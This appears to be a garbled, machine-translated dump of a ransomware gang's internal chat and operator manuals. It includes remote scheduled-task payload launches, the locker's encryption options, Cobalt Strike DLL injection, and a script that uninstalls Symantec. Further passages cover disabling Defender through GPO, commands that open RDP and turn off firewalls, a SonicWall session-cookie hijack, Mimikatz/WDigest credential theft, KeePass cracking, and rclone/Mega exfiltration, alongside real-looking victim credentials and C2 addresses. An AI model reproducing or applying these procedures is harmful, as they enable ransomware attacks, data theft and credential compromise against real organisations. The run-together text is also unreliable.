1.1 If all is well in response we see
[+] received output:
SUCCESS: The scheduled task "WindowsSensor15" has successfully been created.
2. Starting the task
shell SCHTASKS /s remote-hostname123 /run /TN "WindowsSensor15"
2.1 In response we see:
SUCCESS: Attempted to run the scheduled task "WindowsSensor15".
---
At this point the session should arrive. If it does not come, there are several options:
No Internet, binary burned, firewall
3. Deleting a task
shell schtasks /S remote-hostname123 /TN "WindowsSensor15" /DELETE /F
SUCCESS: The scheduled task "WindowsSensor15" was successfully deleted.
There is also with user context. Works by specifying domain/login + password
It's all the same
shell SCHTASKS /s 192.168.97.23 /U "domainad.com\ralexand" /P "Password123" /RU "domainad.com\ralexand" /create /tn "WindowsSensor1" /tr "cmd.exe /c C:\ProgramData\x64.exe" /sc ONCE /sd 01/01/2020 /st 00:00
shell SCHTASKS /s 192.168.97.23 /run /TN "WindowsSensor1"
shell schtasks /S 192.168.97.23 /TN "WindowsSensor1" /DELETE /F
!!!Don't forget to do after getting a spawn session or inject into the process, knocking out your process and deleting the binary you came in with. This way paleoad will live much longer
I will check it on the grid in the morning and i will let you know if i am updating ....... and then updating saksaful and then updating forces at once will ask for a policy update. i just did 1v1 but it did not update like you said. but when all PCs turned on gpuapdate force - worked in the manual you threw the same and it says) in the last case did gpa to disable def, then there in tmd groupupdate force and checked 3-4 servo servers, everywhere wrote that the def program is disabled gpa[ ](https://stylebrooks.com/group/discussion?msg=pFGy7vSNAnTPdcy6m) @red on all PCs ? you checked it straight ? but thanks guys no longer relevant) gotgpupdate /force do on dc and everywhere else is updated immediately and a half hours through the GPO comes the result?all right. well, to make it quick - gpuapdate why on every machine? you do it from the admin on the DC where you work with the GPO and all, and the timing is 90 minutes or wait 1.5h - default timing for the update. I have not checked this point, then the policy is updated, this is the setting that you gave in the screenshot and everywhere def is extinguishedgpupdate /forcefly, on each machine should be done vindef turn on just when a third party AV disables first third party AV then disable vindef through the GPO yesThe question, how to properly organize the shutdown of these protections? First a third-party AV, then through the GPO? Guys, we have a network with FORTY AV ENDPOINT on board. Access to the PU is available. Connected cars simply disconnect - clients are not active (waiting for connection) - but hangs DefenderVasyaPypkin@Air pour okvot here the date fill
into the generalinsulation.com folder
and let me know how it's done
```
172.82.162.66
admin
3cT26dDrDCwS
ftp 21 port
Waiting for him I know he has already got it, but I do not, and when we and Alex will be given the decks and servers under the msf? We are in suspense? did not get there a month of silence?slicetonyternerlexmant3chnologbobbybrandonbradalexvampirstakanspoonmrFlintstonessonarAirFurytwinstevenfat32AraratmagaAndyflyalibarabulkajeremyasdf7f814vycfasgreenwhiteredskywalkersebastiandoyfsargonlunaVasyaPypkincybercatsamuelgiovannimichaelShvedrozetkaEto Don't flood this board with questions! Any technical questions write in the personal - I'll duplicate here then as a question-answer.
WARNING: Everything described in this channel may not be distributed, copied or published on any third-party resources.
Things to remember and know.
1. A separate build is always generated for each grid and you need to query it by calling @alter in the conf.
2. In the standard package, the build is given as an archive, which contains an .exe file and two .dll files for different bit rates for fileless launch via cobalt sessions.
At the moment fileless startup bypasses the vast majority of known AV/EDR systems, no loss in speed is noticed
Startup parameters:
-m[all/net/local]
all - Encrypt all (Default)
net - encrypt network resources only
local - encrypt local files only
example usage:
lock.exe -m all or lock.exe
lock.exe -m local
lock.exe -m net
launch example:
lock.exe -h C:\hosts.txt
-nomutex
Disables mutex protection against double starting.
-size[10/15/20/25/30/35/40/45/50/60/70/80]
This parameter defines how much % of the file will be encrypted (by default 50%), the file is encrypted in different places in chunks.
At the same time databases are 100% encrypted and VM files are 20% encrypted regardless of the value of the parameter.
example:
lock.exe -size 35
-p[path]
If this option is used, the locker will encrypt files in the specified path
It is forbidden to start the locker in normal mode until the specified path is processed.
example:
lock.exe -nomutex -p C:\path
lock.exe -nomutex -p C:\path2
lock.exe -nomutex -p \\\host\path
-log [path to log file]
Enables error logging
Example usage:
lock.exe -log C:\log.txt
All parameters can be combined with each other, the order is not important.
Running as a dll through cobaltstrike
Put the files inject.cna massinjector.cna inject_x86.o and inject_x64.o in the same folder.
Load inject.cna file cobaltstrike -> script manager -> load
An example of running within a single machine where there is a session:
mandllinject c:\path\locker.dll
Pass the arguments in quotation marks
mandllinject c:\path\locker.dll "arguments here"
Example of a single run on X machines with a session:
Select the necessary sessions "in a batch", click on PCM and choose from the menu dllinject
In the dialog box that appears, specify the paths to the dll locker of the required bits and arguments (if any are required) and confirm.
NOTE:
It is forbidden to start the locker in normal mode until the specified path has been processed.
PLEASE NOTE
this is due to the inclusion of nomutex!!!
- What does this mean?
It means that either you can run the locker with -nomutex any number of times with a path, but there must not be a running locker process WITHOUT a path until the "specified" path is fully processed.
Remember which other convention needs a weekend locker Anybody who needs a session for SonicWall's 2f bypass, write now and let teamleaders know what's what.
If you have a problem with SonicWall, you'll have to get it right away if you have a problem with SonicWall in the meantime.
On the dincheck now check with whitelist.
Because with full internet leak pailoads and detects come quickly.
in whitelist add ipaks pads + cobalt servak, add 3 ipaks (cobalt + 2 pads usually we have)
check
session should come and work but paleoad won't leak
when koba gives error and error code, you need to know more details,guys,remind me please how to look error text in koba?
5bRSiB can publish
``+upload
5bRSiB
I was able to connect via webhop, but fotik still says no access to the webhop server
username 0mpgreco
domainname DOMAINNT
password Marilyn1414
username 0mslav
domainname DOMAINNT
password Bblucas2
0mycarri domain admin
username 0mycarri
password Wukong55
I got it, thanks for the tip any hoster actually) where can we get a dedicated server from their region? like kanada they better even look at the server, which directly in their state will be aha, right maybe a dedic from their country need as oboytii I do not know what it is) the regiononalkya know what it is, there is a problem with the connection the first time I met, like one creed fit, but the error during authorization, as if they have set additional check on some parameter, like authorization not only by login and may be like a mac or ip, I remember at work long ago was so....and in the same groups, look at other users and their hashes look in which groups is the user who was valid on the WpN earlier hello, there ntds not small picking up by now...well how did something come up?kk I'll try to pick it up look ntdsfortiktut there is nothing to reshoot it fortikaltegnu so we will reshootnu one person wrote that he was able to solve when he was given other creds googliten put che nmidimo real av need I have tried i tried it with 7 and 10 with brandmauer switched on so i did not see that toohzmoz maybe an av should be set there are some connection requirementswith the same error hz (no it is not the axis try it with 7 need@alex try to subscribealex879 953 707
c8ez85 let's have a look at it together now this FortiClient_6.4.3.1608 before it was FortiClient_6.2.6.0951which client do you have ?i used FortiClient 6.4.3.1606 before that i had FortiClient_6.2.6.0960 before it installed on my client i will check it with air and i will check it with the client no connection to the web i see what i see when i pressed the client opens with the same codes to 80% and error see what's going on there i have to finish jumping with air and will have to work so presskweb and try to go through vpn do not fit the codecs all check it works works works now reschedule this coba is also not available where the last network did 104194.11.92:61214 , maybe there are other koba crosses where you can connect to work? where have worked before209.222.97.23:38614 and the koba is spunikewaiting until the koba rebut where they worked beforeHi all hi@stakan do look in all their merged data something with the aim of
Cyber Excess
Cyber Insurance
Insurance
Cybersecurity Insurance
Cyber Policy
and so on... as it turned out, not enough attention is paid to this in the data dumping, so I want to collect "samples" gentlemen
help when there is no central console and different AVs are not universal, some AVs are not like installed software, you think that is a universal solution for remuv, then in the arg for remuv goesSER GUID for other AVs I do not know, to start remuv need idiishnik which we get in the first line of code and then either luck or no name take directly from the list of installed programs as it saysWheres-Object {$_.Name -like "ENTER AV NAME HERE"}
Write-Host "AV_NAME Uninstall Successful... Continuing"
throw "AV_NAME Uninstall Failed... Exiting "case handled. there are 100 servers with simantec and paiload was in trouble. this solution helped. so this is analogous to guish uninstall, no? uninstalling simantec by parshall. Requires a reboot but after starting this code for 3-5 minutes remoobs and you can jump on the cmb listener and start the locker. This is without the pass.``$SEP_GUID = Get-WmiObject Win32_Product | Where-Object {$_.Name -like "Symantec Endpoint Protection"} | Select-Object -ExpandProperty IdentifyingNumber
#Uninstall SEP - All versions. - Wait for uninstallation to complete
$SEP_arglist = "/uninstall $SEP_GUID /qn"
If ($SEP_GUID -ne $null){
(Start-Process msiexec.exe -ArgumentList $SEP_arglist -Wait -PassThru).ExitCode
If ($LASTEXITCODE -eq 1){
Write-Host "Symantec Uninstall Successful... Continuing"
}
ElseIf ($LASTEXITCODE -ne 1){
throw "Symantec Uninstall Failed... Exiting"
}
}
``@rozetka wrote in personal. Who's online ? Hands needed. urgently )Who has cobalt with paiload that simantec is ? URGENT for those who need to work with SonicWall through browser sessions
Using a WEB-browser to access
```
- take the session from the script output, e.g. "47ZjFKx24Nj2h0UtZKX2OYnZLgRg05aX2SuaotVzrQg="
- Open the browser in incognito mode, open the developer's console (js-console)
- Encode ID of the session in base64
>> btoa ("47ZjFKx24Nj2h0UtZKX2OYnZLgRg05aX2SuaotVzrQg=") [ENTER]
"NDdaakZLeDI0TmoyaDBVdFpLWDJPWW5aTGdSZzA1YVgyU3Vhb3RWenJRZz0="
- type in URL https://target (redirects to https://target/cgi-bin/welcome)
- go into the application/cookies in the console, add the cookie
swap : NDdaakZLeDI0TmoyaDBVdFpLWDJPWW5aTGdSZzA1YVgyU3Vhb3RWenJRZz0=
- in your browser (where .../cgi-bin/welcome) change URL to https://target/cgi-bin/portal
- access the resource under the user's session
` `https://mega.nz/#!nBhlxLaT!3O9jgeDo5u0oCAxWDfEZsywsywpXKBpe6IS0CRvAC_7Ils Manual on Koba (ru)Friends, if there is anyone from Ukraine - write to the PM. This is important.question is resolved by installing JRE 9 dialogue can Ctrl + Plusa does anyone know how to increase the size of the coba on the monitor 4k 32? The entire operating system is scaled to 150 and the coba - take your eyes out) throw 4.1 at least) because the new hardware, there is no nifig) did not test it? 4.2 like walking on the forumanybody can throw the server part of the 4.1 in the archive?sargondoyfsebastianskywalkerbarabulka hello everybody hello, I'm going back to work this week, still cleaning up the mess last year - but in touch, who else is resting at will can rest until Monday because some of our partners will be a week, but cases and work there so who needs - write to the PM today, will find, will give out) @atom ask @terner ` ` `
Hi guys
if someone has brute-forced the mail, or knows some useful links, please share
``elefantkalinka ``without a hook trying to run a hike tried koba 4.2 put - no way eh. says the wrong authorization file is in the one that was given here, then went to the exp downloaded 4.2 cracked from there - and the same thing - wrong authorization file, I do not know what the hell happened to who already color 2021 1675 ?https://github.com/SecureAuthCorp/impacketпомидорами do not throw) what the implementation under the impaket, googled did not understand where to apply it[ ](https://stylebrooks.com/group/general?msg=qcFvuzmqggyqnuuii) please write back if anyone successfully exploited with dll cobalt at least pick any hoster that accepts bitcoins, the rest is unimportant, got it,@all hi pod vpn> suggest hosts for linux[ ](http://wfy76wigkpoxqbe6.onion/group/general?msg=zAi3XiXxE45FqTAiE) ?
https://github.com/cube0x0/CVE-2021-1675
Sploit implementation right under the impacket
Rosetka suggested a working trick to change the date in Cmd
If you get a coba telling you that your license has expired, do the following:
In Cmd change the date with the command data 01.07.2020.
After that start the coba and change the date back,
OpenVpn might complain about expired certificate
try it on vin 7 and did not work on vin 7, still the same error, does not connectprivethe192.95.20.8
u: Administrator
p: iddqdidkfa!@#$IDDQDIDKFA
```
``I ordered it, is it Canadian, so? +support hashahueno )a fucking time-saver in raising the truth nihueno://securityonline.info/lsassy-extract-credentials-from-lsass-remotely/ output fuck. dekript remote would output type in file? it simply has a checkbox /password
he should de-crypt with it but it doesn't work and i've never tried it
i'm not sure if sharkhrom gets into the file correctly ... was chrome taken off the remote control without dpapi key ? can sharkhrom get a script ?
```
histories in kmd . sometimes there might be something useful
RDCManremember pliz what to process servers through the rdp not to clog the cracks all the time? rdp manager or so the software is called, thanksvidos which is the main from alterabyls manuale like all hello pliz how to properly use the Net-GPPpassword.exeobviously in the msf this is in paiload and arrives at the session
you can use paleoad to execute code in kmd - for example, to create a local admin. then authorize it and drag the credentials.
``exploit(windows/local/ms16_032_secondary_logon_handle_privesc)``
in case of successful exploitation, should it throw a session to us in the coboo from the system? or a process from the system to raise on the host?[ ](https://stylebrooks.com/group/general?msg=hASmKe5grxTijBaTv) and what is useful there? right, and I'm talking about the file ntuser.daton for taking hashes off-line if you sdamped ntds from pdc just in case I tried to use it and it failed.https://github.com/zcgonvh/NTDSDumpExШас showWho knows, is it possible to extract useful information from the file ntuser.dat and if so, how to do it?
Who has used Little Snitch? Pm report plyzest useful thingshttp://morph3sec.com/Cheat-Sheets/Windows-Red-Team-Cheat-Sheet/mozhet to someone will be helpfulNo, it is better not to make noise, and use something from the native utilities, but psexec seem locked in sophos and the service itself is not remote host does not start it and psyekzek comands isremote-exec psexec mb ?what do msf not like then? they also have psexec there) no
it's about the psexec utility itself being blocked by avera) what's to solve here so bypass it guys, didn't you have sophos psexec blocked?
No one knows how to solve it without access to the console?
Can't you do something in the registry or stick psexec somewhere in sophos? Yeah, I got it, thanks[ ](https://stylebrooks.com/group/discussion?msg=L6dwAKr2LyBxS7GiC) then control F and ``Gigabit
``that kind of thing``
exclude
DB
SQL
FS
DB servers are either off the Internet or have security solutions (or should have) APP
MAIL
EXCH
PUB just choose a server and call it from Psexec \remotecomputer systeminfo
``psexecec scriptsysteminfodoes anyone know if it's possible to make a check of the machines on the internet channel to find a gig for pumping[ ](https://stylebrooks.com/group/discussion?msg=sDY76YDoo3R4YkmjZ) If anyone else needs it, we beat it this way:
```
Adobe Flash Player when trying to run content in browsers redirects everyone to the site where it says the end of support and use the content does not come out.
But there is a solution, in recent versions there was a "time bomb", which works around quite easily - just change the date to 11.01.2021 and voila content access
``````
for /F %%i in (hostnames.txt) do dir "\\%%i\\c$\ProgramData\oracle\config\public" >> log.txt
Aah, bring it back. I'll test it. if it's still relevant and if I understand you correctly) oracle change the name of the software you need Who can make a simple binary? TK :
There is a way
``\\hostname\c$\ProgramData
\\{\hostname1\c$\ProgramData
\hostname2\c$ProgramData
```
Take a listing
In the output we get ala
````\\hostname\c$\ProgramData\oracle
{\hostname\c$\ProgramData\microsoft
{\hostname\c$\ProgramData\Adobe
```
Next, take the listing and put it in a file like this
```
dir "\\hostname\c$\ProgramData\oracle\config\public >> log.txt
dir `\\hostname\c$\ProgramData\microsoft\config\public >> log.txt
dir `\\hostname\c$$ProgramData\Adobe\config\public >> log.txt
dir `\hostname1\c$\ProgramData\oracle\config\public >> log.txt
dir `\\hostname1\c$ProgramData\microsoft\config\public >> log.txt
dir `\\hostname1\c$$ProgramData\Adobe\config\public >> log.txt
```+
and a toad on top of it. Good morning, gentlemen.
Does everyone have expa? old browsers does not work, ruffle does not come in the desktop console can not see the plugins on the sphere backup, html5 does not support the sphere itself (old one) has anyone encountered the fact that you can not go to the web console vsphere because of the end of support for flash player? Thanks the same (gentlemen who already worked on 4.2? did not encounter the problem of "dying" session when simply trying to open the kob file browser ?
at first I blamed the side of the av, but after testing on your own deadlock, the effect is the same !) a), but I do not need it anymore) I zalezhesh Last Pass and I daina not really need it - and actually understand what you mean) It was just a question, and then gave a link where to shove and where to get the hash, but other options thrown immediately into the piggy bank[ ] (https://stylebrookscom/group/discussion?msg=CkgMtEc6rbk5ody5t) passwords from chrome and if there is a possibility of mutation deallay all passwords from chrome and pobrutParties, do you have at hand userdump.exe, clean
the link is dead https://www.microsoft.com/en-us/download/404Error.аѕрхи on the githab is a thread swearing at the script from harmj0y so if you have an option online without having to dance with the installation of unix os then it is better to think so john the most capital variant, although I am not particularly familiar with it yet) by the way yes note ! that script that on the link for me, too, did not work ! solved the one that came with the OS out of the box ! tried a couple of minutes ago via a script on python, but a little output did not give, maybe it's in the algorithms or so. I am from unix, I had a J.R.well! thank you faster http://hashes.com/en/johntheripper/keepass2john ` `!
https://www.harmj0y.net/blog/redteaming/a-case-study-in-attacking-keepass/
http://www.harmj0y.net/blog/redteaming/keethief-a-case-study-in-attacking-keepass-part-2/
``@alter yes
the output is something like ``
Passwords:$keepass$*2*6000*0*221591f87534ede8b704227ec925802a78e8fd516b11278766f43a542e27cd22*68a3559c44bbc1d3ec8f59c646680915bd432b39f4e14f173666322ffc68e2b4*ecf2bf73bd822f1f94c4b9b2290ad93e*6f5515fc4fc3916729346e913060aaebe9f56383b32c554b35abaa03244ef65e*cbf8542495556206ddaf3cc7ab6064aba7eda33d410ab0deabf12500f87cd205
```
but do not forget to watch the config file it is usually in the appda, if the passport is not portable, by configuration you can understand whether you use only master password or master password + login in the system, etc. there are several variantsoknet
should not be if you use the utility userdump.exe then the process will not die after the dump?
To create a dump file for the sqlservr process, the command would be:
C:\userdump sqlservr.exe sqlservr.dmp
So is it dumping the running process? @white and how is it just dumping a password hash out of a cdbh file? just recently there was a case with keipass db password - thanks a look atJohon the Ripper dumped the hash perfectly, and then everything is classic, exactly no open copies of programs (hmm... thanks to memory find where kipass is running and dump it alivePlease tell me, found .kdbx but no pass, brute force pass from the grid did not give any success. What other options are there? Happy Holidays guys! Cloud Repository in viam - who dismantled it? How does it work? Hash with access decrypted, login pass and host are there. From external ipac scan nmap with checkbox -Pn bunch of ports - everything is closed. What is the protocol/port and how do I break the backups? i can't hear alex since friday, he's gone missing somewhere, i'm waiting for him i'll be here by eveningsonar take ayra and i'll give you a clean paleidlogin and pass i threw you the data on the download, go up to the admin at home, jumpyvoice through the smb login i found it
[+] 10.19.222.47:445 - 10.19.222.47:445 - Success: 'calbeena.com\jkepley:Nellie69' Administrator
[+] 10.19.222.50:445 - 10.19.222.50:445 - Success: 'calbeena.com\rfoltz:Money$123' Administrator on 1 vpn krede approached the time of the change of pasvidimoe you just got burned or the time of the change of pasvidimoe on which was vulnerability at me toopodtrivayte take local admin hash and puncture itpodobnoy i can pull 1 session and they have not validate this netair do as we jumped then sonar need to look for the kredeys these kredeys are not valid anymorecom\serveradmin:P8w7521!' Administrator session is deaddate with the downloaddetermine and on the downloaddetermine how to download ?
COBA://104.238.220.89:59062
n9JidNWJmCwONb8g8codTqULgTzBXHrtuG
``That's the way to run it''.
rundll32 name.dll, GetStdHandle
``beacon> jump again I gave you dllllpoe cmb
``beacon> jump psexec64 10.16.181.12 smb_L
[*] Tasked beacon to run windows/beacon_bind_pipe (\.\pipe\npfs_8f) on 10.16.181.12 via Service Control Manager (\\10.16.181.12\ADMIN$\45bae58.exe)
[+] host called home, sent: 291438 bytes
[-] Could not start service 45bae58 on 10.16.181.12: 2
[-] Could not connect to pipe: 2
``````
Line 2: [+] 10.16.222.22:445 - 10.16.222.22:445 - Success: 'calbeena.com\serveradmin:P8w7521!' Administrator
Line 4: [+] 10.16.181.22:445 - 10.16.181.22:445 - Success: 'calbeena.com\serveradmin:P8w7521!' Administrator
Line 7: [+] 10.16.181.12:445 - 10.16.181.12:445 - Success: 'calbeena.com\serveradmin:P8w7521!' Administrator
Line 9: [+] 10.16.222.159:445 - 10.16.222.159:445 - Success: 'calbeena.com\serveradmin:P8w7521!' Administrator
Line 12: [+] 10.16.222.24:445 - 10.16.222.24:445 - Success: 'calbeena.com\serveradmin:P8w7521!' Administrator
Line 14: [+] 10.16.222.136:445 - 10.16.222.136:445 - Success: 'calbeena.com\serveradmin:P8w7521!' Administrator
Line 17: [+] 10.16.222.28:445 - 10.16.222.28:445 - Success: 'calbeena.com\serveradmin:P8w7521!' Administrator
Line 19: [+] 10.16.222.29:445 - 10.16.222.29:445 - Success: 'calbeena.com\serveradmin:P8w7521!' Administrator
Line 20: [+] 10.16.124.20:445 - 10.16.124.20:445 - Success: 'calbeena.com\serveradmin:P8w7521!' Administrator
Line 23: [+] 10.16.124.7:445 - 10.16.124.7:445 - Success: 'calbeena.com\serveradmin:P8w7521!' Administrator
Line 25: [+] 10.16.222.39:445 - 10.16.222.39:445 - Success: 'calbeena.com\serveradmin:P8w7521!' Administrator
Line 28: [+] 10.16.124.39:445 - 10.16.124.39:445 - Success: 'calbeena.com\serveradmin:P8w7521!' Administrator
Line 30: [+] 10.16.181.39:445 - 10.16.181.39:445 - Success: 'calbeena.com\serveradmin:P8w7521!' Administrator
Line 33: [+] 10.16.222.11:445 - 10.16.222.11:445 - Success: 'calbeena.com\serveradmin:P8w7521!' Administrator
Line 35: [+] 10.16.222.13:445 - 10.16.222.13:445 - Success: 'calbeena.com\serveradmin:P8w7521!' Administrator
Line 38: [+] 10.16.222.12:445 - 10.16.222.12:445 - Success: 'calbeena.com\serveradmin:P8w7521!' Administrator
Line 43: [+] 10.16.222.25:445 - 10.16.222.25:445 - Success: 'calbeena.com\serveradmin:P8w7521!' Administrator
``Which dll jump my not come session all hello jumped ?how are you doing ?pull on cmb port for vmik is closedERROR is climbing:
Description = The RPC server is unavailable.when I want to pull up[+] 10.19.222.57:445 - 10.19.222.57:445 - Success: 'calbeena.com\amondragon:AlPe$7148' Administratorokay I will run myself) (I do not have a server with metasploithere that was and look for koboya I'll give you a soxmozhet to cmb run servers? and send data to kobipid552460 kobaa what koba and what pid?so here's the sortez gentlemen)will assemble addaway jump excellentnot yet slitherode found a stable connection morning picking up normalvpn rises but after a minute drops out because the users on the course reconnectokshcha i will raise i have a dedicle all hey just go to him ping modet just firewall closed should load the dedicle and does not ping so far what with the guys can i dedicate or while with the guys?sonar will check in 5 minutes and it will be ok by evening I do not have a wake-up call, do you have the ddik?hi all hello@Air[ ](https://stylebrooks.com/group/conti?msg=9NrF3MDkPoHiWyd3D) rumor has it that the number of threads can be reduced as an alternative to samba. are there any interesting options how to debug without a test? what to test, apparently avers started fighting in their circle, a couple of months and all this to vedutuga i understand can take the av and test if such a thing and he does not give a sale to the averlockehr.exe -p \\host\c$ and eh and the dll? when started from a foreign process or from the hard drive? sofos TM kasper two or three months and all the avs will enter =) there may still be a chance to revive the method need to debuginethe securiti like kasper? or kasper antiransom suite? not encountered but I think the injector to patch kasper started to paralar lock + TM probably also
anyone else had a problem with what?
by the way, also saw this arbitrage, 7kk) dzhe chem with this, each other rolled up, although the ransom was not, tinny)))
```
there marazmibo with default -size 50 you need to rerun 7.5tb, it takes a very long time (= do not have time) locally
but put -size 10 or -size 20 inside operations there is another folder with the same contents, inside this folder there is the same folder with the same contents etc
When I downloaded the date all zips grabbed this folder and download the same files, but if you consider recursion there is a tb 15, but in fact the original date there at 500gb where is the recursion?guys,does anybody know if there's recursion in a folder then the locker will encrypt the same folders again and again until recursion ends? for example Y:\operations\operations\operations\operations, etc. By the way, I also saw this arbitrage, 7k) I don't know what will come of it, they'll bait each other, although there was no ransom, trivia)))PR:Dinteresting))
[10:32:11] 8-800-555-35-35: there are no such top lockers left on the market.
[10:32:18] 8-800-555-35-35: maze aka egregore gone
[10:32:22] 8-800-555-35-35-35: Conti's gone
```
here's what unkn writes, found in the arbitration on the xdex, you cling to it, on the virtual machine you raise Kali\backbox you can walk around and the fortress doesn't care about it wantkn, don't use cobalt) i tried to wrap the route to the timeserver through my gateway is there any way around it?and there is something that cuts your connections when you connect the VPN - your network connection goes through the internal network of the company I checked the routes, fortik can proxy or what?and if the firewall - there may be a whitelist tls handshake, that's how) i mean how the routes are fine or the firewall is twisted, in any case, it's from the side of the network defenses, but how?ids blocks you, traffic to the coba begins to go through the internal routing when you connect to the vpndavay look at itself is a virtual machine and from there podrobivyte on dedik virtualkuping to timeserver goes, the route does not change the connection on the rdpvpska flies away from the hookupre guys, hey, who had this, connect the fortik > flies off the server from cobaGrimnirCodeocta0dayinbizChucktu@topuy write please feedback on tulchin
what is not working
what is not clear how it works
what to add
what to remove
When you click on spread a window opens with 5 fields
1 In the first field you have to choose a path to the artifact file to create sessions or exe/bat/dll file for the payload
2 In the combo box select wmi/plsexec method
3 In the third field you must enter the default path to load the file as "C:\ProgramData".
4 In the fourth field select the path to the list ip/host
5 In the start line you enter arguments, if there are no arguments you just need to press Run Spread
6 By pressing Run SpreadForms a request to the domain to the controller ip/host from the list in response comes the addresses to the target hosts
7 Forms UNC path to target directory
8 Paths are sent to download function and it loops to download the selected file.
9 After a timeout of 10 seconds (this timeout can be adjusted), to be sure the file is in the chosen directory, a startup command is sent with arguments (if they are given)
``@all together update all those who use
enhancement_chain.cna
main.cna
Import
Pay special attention to Other->Lateral
this is a tool to distribute and run eh/dll files through a list of hosts/ipacsnimbus2000 will work this weekend ? hello there + hello there ! anyone alive ?
i will write to him log on to the iphone from the dedicat and jump there brad has a tsktak you said with food to do, but now wait till you can get on the rdd can do it with brad chase the net with the iphone what to do yes i told you there is work ?vampirnot yet have a job mubea + hey all, stevie, i got nothing to do (search for passes in the kipasa not take into account) all hey, what do i do today, i'll give you something soon what to do? thank you[ ] (https://stylebrooks.com/group/general?msg=cFaT9BfhcCaaXdoKH) here's the bro, here's a guide how to use the shuttle so you do not separately porting, i did not put it right
```
https://defcon.ru/network-security/3789/
it's a really interesting thing) @cybercat can you show me what it's about? > https://sshuttle.readthedocs.io/чет I only found in the instructions how to wrap traffic, I do not see how to forward ports, port forwarding@cybercatsa as far as I understand it on the client then you can for example raise proxy, I glanced up, it is vpn via ssh server without administrative access, got it right? mysql? Guys, do we have any whining pros?:sweat_smile:on the githab who made a new proxygon? if you can't connect to ipn then you can unpair the ipn users from AD and brute force them, not all domain accounts are blocked if you connect to ipn but you need to take the domain again. I had one login last night and got kicked out. can i have a panic attack on my account?[ ] (https://stylebrooks.com/group/discussion?msg=tLMMQuqQ59Kvu9dDu) In general, there is a VPN check on the ms17 for starters) and had to remove the local admins from the cars) so if the vpn broke the aces as you turn to the dk? Guys! All have a good start to the week! No such fucks like us) In general, there is a VPN. And all. All accounts are blocked, the admins burned the activity. ZeroLogon defrauds from the VPN? Can I try it from the VPN? But I need to somehow pull the DC. Is there a point to fight?
```
-v
``and there will most likely be an error there will show all that thinks about you)I will try, thank you and what gives this flag?
--verbose
there may be a problem with this flag... add ``verbose flag'' to the rootclone... add ``bose flag'' to the rootclone... does it work at all?people, what do you think may be the case - rklon could not pull the archive size of 11gb, time was plenty, but when I unloaded the folder, there is no problemspasibut look here convert = http://www.hexadecimaldictionary.com/hexadecimal/0xd3d/REG QUERY "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber If it doesn't work, check the RDP port used therereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKLM\SYSTEM\CurentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
netsh firewall set service remoteadmin enable
netsh firewall set service remoteesktop enable
netsh advfirewall set allprofiles state off
netsh firewall set opmode disable
Hi, I need to use the VMIKEK or VMIKEK from the impacket. Could you please tell me how to open port 3389 remotely. I used a command via batnick and remote-exec psexec does not work.
``reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
I think some kind of key is specified in the general topic today can not work with bicon, from cmd have to. i do not know how to pass the parameter password, with bicona google the key all i understand in the launch string password is specified@ATX and you start from bicon ? you can join cps tunnel through ngrok, create a separate ssh account and ipac will hide behind ngrokommega locate, so reservers copy should always have. and ftp/sftp abuzz tooa about the ban account - it's clear, just what's confusing, what these fuckers did not delete ni mega nor configsynchronization is configured if korp write abuzz on the mega, indicating a specific ak, and there is one username\login enough, then in theory may ban the akda for nothing. Ideally, put mega software on the deck - megasinh, and immediately synchronize remote folder from the mega to your granddisk, and it turns out, all that downloads rklon simultaneously synchronized to your granddad thanks brother, of course I was stupid look at you dolboycher I if you do not put a password in the config - mega account in the config in the open form# Encrypted rclone configuration File
RCLONE_ENCRYPT_V0:
ch1QBcoL8zkZ1B2IVQtV00DqEkBAKMpJEJFz1k4iEKNwVHICSBHS9nGgT6Fx1ucyHRd4GKC/jlsAWtwhpNkFpSN0LzEJeth9AtMqoIMIo+Y+p9TZybEGu9Ba8xjj2BjqFW61xy773gNElFXVOcwxAcYXq4yIWFuiMk2X if to put a password in the pclone config, the config looks like this, you'll have your mail stolen, as far as i know, when you create a config, there рclone encrypts only the password and you encrypted the config with the password?haven't heard such a thing, hello everyone, has anyone experienced mega account blocking when you drag there date pclone ?
just at me pklon itself and config file in place, and the account is blocked, usually, if the network palyat rklon, then it then you can not find, because it deleted, but here everything is in place and the account in the block.toomochaniya there multithreading is set to 100 or so if you will use through sox put a flag -t15 or 20[ ](https://stylebrooks.com/group/discussion?msg=dRuYGZwajMWKbTJiq) the most effective solution[ ](http://wfy76wigkpoxqbe6.onion/group/discussion?msg=doNK6ztT6DHJALcin) can give vpsku with meshcrackmapexec through sox trya although no, not a fact, I am stupid uene 5-10-15 try to catch account lockoutCertainly know where the user can go where not.Guys, there is a way to check the cracks on all machines as that from the kobe? Where to go where not. Pro MSF I know, but is there a quick solution? As MSF is not up, there is no other software, and if mimicatom from the disk clear the fuck will eat all the software and its libs in the context of the session process in general as I know mimic in cobalt works in memory randll32 but now with hands without a koba, i can't do it with cobalt because it has a different working principle and sometimes with avs it's ok, but if you work with cobalt, you can't inject with vin10 mimicatz verushelny in principle any AV will fuck you up) mimicatz on verushelle is ok, because vin10 has amsi and defender will fuck you up as well look it up
defender is sure to fuck up such an injection hook and is much more productive with hooka got it, it's clear enough if you're lucky in a day or two remove the password from the dumpdump then there plug in the key to vdigest and sit back and wait look where your man goes most often, If you need a password by cleartext I would do it this way but it will disappear if the user leaves. The principle is the same if you put the key on the vdigest and wait for the user to log in - cleartext pass will be in the lss memory when you have to reboot in cis32 and then it also records all logging in but when it is injected, when a user logs in, the user's pass logs into the textam in order for your password to fall admin must enter ita Didn't you re-login when you used memssp? is there a cleartext pass falling to you right away?[ ](https://stylebrooks.com/group/discussion?msg=Qra2wRNbginGMesge) no, it's ok) maybe there's other software this hook can do more than just mimics without any dumps of lsas and will write them in text, then wham, and wait till everyone is re-logged. i asked, maybe there's a more legitimate way, it's death to unlogin admin) or it's an inject to rewrite completely (in fact we came to the same thing)
put the dongle in the register, unlock it and wait
